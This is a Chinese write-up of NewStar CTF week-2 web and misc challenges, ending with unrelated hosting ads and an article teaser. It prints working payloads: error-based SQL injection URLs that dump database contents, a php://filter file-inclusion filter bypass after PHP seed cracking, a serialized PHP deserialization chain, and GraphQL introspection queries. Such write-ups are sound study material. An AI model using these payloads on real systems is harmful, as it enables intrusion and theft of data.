文章目录
- WEEK2
- WEB
- Word-For-You(2 Gen)
- IncludeOne
- UnserializeOne
- ezAPI
- MISC
- Yesec no drumsticks 2
- Coldwinds’s Desktop
- 奇怪的二维码
- qsdz’s girlfriend 2
WEEK2
WEB
Word-For-You(2 Gen)
题目描述
哇哇哇,我把查询界面改了,现在你们不能从数据库中拿到东西了吧哈哈(不过为了调试的代码似乎忘记删除了
报错注入
/comments.php?name=1'and updatexml(1,concat(0x7e,database(),0x7e),1)--+
Current Database: wfy
/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=database()),0x7e),1)--+
Tables in database(wfy): wfy_admin,wfy_comments,wfy_information
/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wfy_comments'),0x7e),1)--+
Columns in table(wfy_comments): id,text,user,name,display
/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(text),30) from wfy.wfy_comments),0x7e),1)--+
IncludeOne
<?php highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."
";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
if(!preg_match("/base|../i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
//flag in `flag.php`
include($_GET['file']);
}else{
echo "Baby Hacker?";
}
}else{
echo "No Hacker!";
} Hint: 1219893521
首先爆破伪随机数:https://www.openwall.com/php_mt_seed/
root@mochu7-pc:/mnt/d/Tools/Web/CTF/php_mt_seed# ./php_mt_seed 1219893521
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 18382.0 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x0011793a = 1145146 (PHP 7.1.0+)
Found 1, trying 0x16000000 - 0x17ffffff, speed 183.6 Mseeds/s
seed = 0x161c5abb = 370956987 (PHP 5.2.1 to 7.0.x; HHVM)
Found 2, trying 0x64000000 - 0x65ffffff, speed 177.0 Mseeds/s
seed = 0x64a22f28 = 1688350504 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x64a22f28 = 1688350504 (PHP 7.1.0+)
Found 4, trying 0xc4000000 - 0xc5ffffff, speed 170.5 Mseeds/s
seed = 0xc4b59923 = 3300235555 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4b59923 = 3300235555 (PHP 7.1.0+)
seed = 0xc4efe664 = 3304056420 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4efe664 = 3304056420 (PHP 7.1.0+)
Found 8, trying 0xfe000000 - 0xffffffff, speed 168.2 Mseeds/s
Found 8
PS C:UsersAdministratorDownloads> php -r "mt_srand(1145146);mt_rand();var_dump(mt_rand());"
Command line code:1:
int(1202031004)
第二层使用伪协议,php://filter/
协议自带一层url解码,这样双层url编码可以绕这里的过滤,至于NewStar
关键字可以用管道符分隔开用作过滤器(错误的过滤器也不会报错)
/?file=php://filter/read=convert.ba%25%37%33e64-encode|NewStar/resource=flag.php
guess=1202031004
PS C:UsersAdministratorDownloads> php -r "var_dump(base64_decode('PD9waHAgLy9mbGFnezc4YWY5ZjhhLTljMGUtNDJmNS1hYmY5LWFkOWUyY2FhZjE0Nn0K'));"
Command line code:1:
string(51) "<?php //flag{78af9f8a-9c0e-42f5-abf9-ad9e2caaf146}
"
UnserializeOne
name;
}
public function __isset($var)
{
($this->func)();
}
}
class Sec{
private $obj;
private $var;
public function __toString()
{
$this->obj->check($this->var);
return "CTFers";
}
public function __invoke()
{
echo file_get_contents('/flag');
}
}
class Easy{
public $cla;
public function __call($fun, $var)
{
$this->cla = clone $var[0];
}
}
class eeee{
public $obj;
public function __clone()
{
if(isset($this->obj->cmd)){
echo "success";
}
}
}
if(isset($_POST['pop'])){
unserialize($_POST['pop']);
}
POP链
Sec::__invoke()
obj = $start;
$sec->obj = $easy;
$sec->var = $eeee;
$start->name = $sec;
$start->func = $sec;
echo serialize($start);
?>
O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";r:1;}}s:4:"func";r:2;}
ezAPI
www.zip
提供了源码
array(
'method' => 'POST',
'header' => 'Content-type: application/json',
'content' => $data,
'timeout' => 10 * 60
)
);
$context = stream_context_create($options);
$result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
return $result;
}
if (isset($id)) {
if (waf($id)) {
isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{nusers_user_by_pk(id:' . $id . ') {nnamen}n}n", "variables":null}';
$res = json_decode(send($data));
if ($res->data->users_user_by_pk->name !== NULL) {
echo "ID: " . $id . "
Name: " . $res->data->users_user_by_pk->name;
} else {
echo "Can't found it!
DEBUG: ";
var_dump($res->data);
}
} else {
die("Hacker! Only Number!");
}
} else {
die("No Data?");
}
?>
$_POST['data']
可以传入GraphQL
查询语句
开启了Debug
模式,由于GraphQL
自带强大的内省自检机制,可以查询出GraphQL
中所有的Query
、Mutaion
、ObjectType
、Field
、Arguments
。
id=1&data={"query":"n query IntrospectionQuery {rn __schema {rn queryType { name }rn mutationType { name }rn subscriptionType { name }rn types {rn ...FullTypern }rn directives {rn namern descriptionrn locationsrn args {rn ...InputValuern }rn }rn }rn }rnrn fragment FullType on __Type {rn kindrn namern descriptionrn fields(includeDeprecated: true) {rn namern descriptionrn args {rn ...InputValuern }rn type {rn ...TypeRefrn }rn isDeprecatedrn deprecationReasonrn }rn inputFields {rn ...InputValuern }rn interfaces {rn ...TypeRefrn }rn enumValues(includeDeprecated: true) {rn namern descriptionrn isDeprecatedrn deprecationReasonrn }rn possibleTypes {rn ...TypeRefrn }rn }rnrn fragment InputValue on __InputValue {rn namern descriptionrn type { ...TypeRef }rn defaultValuern }rnrn fragment TypeRef on __Type {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern ofType {rn kindrn namern }rn }rn }rn }rn }rn }rn }rn }rn ","variables":null}
右键查看源码
直接关键字搜索flag
,找到了ffffllllaaagggg_1n_h3r3_flag
和flag
字段,尝试直接查询
id=1&data={"query":"query{ffffllllaaagggg_1n_h3r3_flag{flag}}"}
MISC
Yesec no drumsticks 2
零宽度字符隐写:https://330k.github.io/misc_tools/unicode_steganography.html
Base家族识别:https://basecrack.herokuapp.com/
>>> bytes.fromhex('666c61677b496e6772336431656e745f30465f59657365635f69355f4f4f4f4f4f7d')
b'flag{Ingr3d1ent_0F_Yesec_i5_OOOOO}'
Coldwinds’s Desktop
montage *.PNG -tile 12x12 -geometry 30x30+0+0 flag.png
gaps --image=flag.png --generations=50 --population=144 --size=30 --verbose
flag{Y0u_successfu11y_s01ved_the_puzz1e}
奇怪的二维码
很明显是一种QR Code
,但是使用这个:https://products.aspose.app/barcode/recognize#/recognized 识别不出来
code.png
末尾附加了一张PNG图片
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
相关推荐: 使用Python寻找黑洞数This is a show file page
黑洞数是指这样的整数:由这个数字每位上的数字组成的最大数减去每位数字组成的最小数仍然得到这个数自身。例如3位黑洞数是495,因为954-459=495,4位数字是6174,因为7641-1467=6174。 本文重点在于内置函数sorted()和revers…